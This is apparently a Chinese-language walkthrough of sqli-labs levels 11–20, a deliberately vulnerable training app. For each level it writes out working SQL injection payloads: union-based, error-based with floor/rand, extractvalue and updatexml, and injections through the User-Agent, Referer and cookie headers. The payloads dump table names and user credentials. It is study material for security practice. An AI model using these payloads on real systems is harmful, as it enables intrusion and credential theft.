sql-labs 11-20关

Less-11

首先在输入框里随便输入账号密码，可以看到URL里无任何变化，所以这关是POST传递了。
但是不管是怎么传递的，数据在传输到后台的处理是相同的，后台sql语句照样可以被我们修改。

我们先输账号为：admin'密码为:123可以看到

123被单引号括住，说明是单引号闭合型。
接下来输入账号为：admin'#，密码为：123可以看到，页面显示
正确进入，而且还有两个显示位面。这就基本上和第一关一样，用联合注入。思路和第一关差不多，先输入一个不存在的用户名使前半部分报错0admin' order by 3#,（注意这里注释的话要用#，用–+页面会报错的）

页面错误，将3改为2，页面正常。所以有两个字段，之后的步骤参考第一关的详细步骤
在这里只把代码写上
爆数据库名:Username:0admin' union select 1,database()# Password:随便输入。
爆数据表名:Username:0admin' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),2#
爆字段名:Username:0admin' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')#
爆所有数据:Username:0admin' union select (select group_concat(username) from security.users),(select group_concat(password) from security.users)#

Less-12

尝试admin')页面错误，admin")也面正确，所以这关为")闭合型注入，后续步骤参考Less-11。

Less-13

这关为')闭合性，但没有显示位，所以要用盲注。详细参考第五关的报错注入
代码如下:
爆数据库:0admin') union select count(*),concat('~',(select database() ), '~' ,floor(rand(0) *2 ) ) as a from information_schema.tables group by a#
爆数据表:0admin') union select count(*), concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a#
爆列名:0admin') union select count(*),concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#
爆用户名:0admin') union select count(*),concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

Less-14

这关为"闭合性,依旧没有显示位。代码和上一关一样，只需把')改为"即可。

Less-15

这关为'闭合性，代码和13关一样，只需把')改为'即可。

Less-16

这关为")闭合性，代码和13关一样，只需把')改为")即可。

Less-17

这一关不管怎么找闭合性，都只出现同一串英文字母。翻译一下原来是骂我的，差点就吃了没文化的亏。
看了大佬的博客，原来是后台对传递过去的账号进行了过滤。看看源码

但所幸的是密码没有被过滤，应该可以从密码着手。
Username:admin Password:1' order by 3#可以看到

有个报错显示，想到可以用报错注入。
爆数据库:Username:admin Password:1'and extractvalue(1,concat(0x7e,(select database()),0x7e))#&sub mit=Submit
爆数据表:Password:1'and extractvalue(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),0x7e))#&sub mit=Submit
但是，到这里发现只出现了一个表名

那这样好像进行不下去了。参考大佬的博客，得知
可以使用updatexml函数。
（1）updatexml()函数是MySQL对xml文档数据进行查询和修改的xpath函数
（2）updatexml(xml_target,xpath_expr,new_xml)
（3）xml_target：原来的xml，也就是要替换的目标；
（4）xpath_expr：xpath的表达式；
（5）new_xml ：替换后的xml；
（6）这一段的意思就是，用new_xml把xml_target中包含xpath_expr的部分节点（包括xml_target）替换掉。
在注入时，' or updatexml(1,concat('#',(Clause)),1)#
这时，Clause就是我们需要用到的子句了。
原文链接：https://blog.csdn.net/weixin_43733035/article/details/86561654

爆完整的列名
Password:' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

爆字段名：' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1)#

查询数据时，并不能直接用简单的select concat(username)，这样会引起报错。
因为在同一个语句中，不能先查询表中的值再update这个表，可以先把查询出的值作为一个派生表，然后在这个派生表里面再次进行查询。

爆数据:' or updatexml(1,concat('#',(select * from (select concat_ws (' ',id,username,password) from users limit 0,1) a)),1)#然后修改limit的值就可以查到所有数据。

Less-18

这一关看了原发发现，对Username和Password都进行了过滤

那这样的话就不能在输入框里进行注入了。
但是在源码中看到了
看到了将 useragent 和 ip 插入到数据库中，ip修改起来比较麻烦，但useragent可以抓包改包。

抓包修改后，正确登录进去发现，怎么修改怎么显示。
查数据存在哪个数据库
' or updatexml(1,concat('#',(select database()),'#'),1),1,1)#

查所有数据库
' or updatexml(1,concat('#',(select concat(table_name) from information_schema.tables where table_schema='security' limit 1,1),'#'),1),1,1)#

这里需要注意updatexml函数，源码的insert语句中要插入三个数据，所以要有三个1，保持字段一致。

Less-19

登录之后发现，显示了Referer，所以抓包修改Referer就行了，参考Less-18.

Less-20

输入正确的用户登录进去发现，有很多显示的地方

抓到包挨个注入，发现只有修改cookie可以。
' or updatexml(1,concat('#',(select database()),'#'),1)#

然后只要修改查询语句就行了，参考Less-18。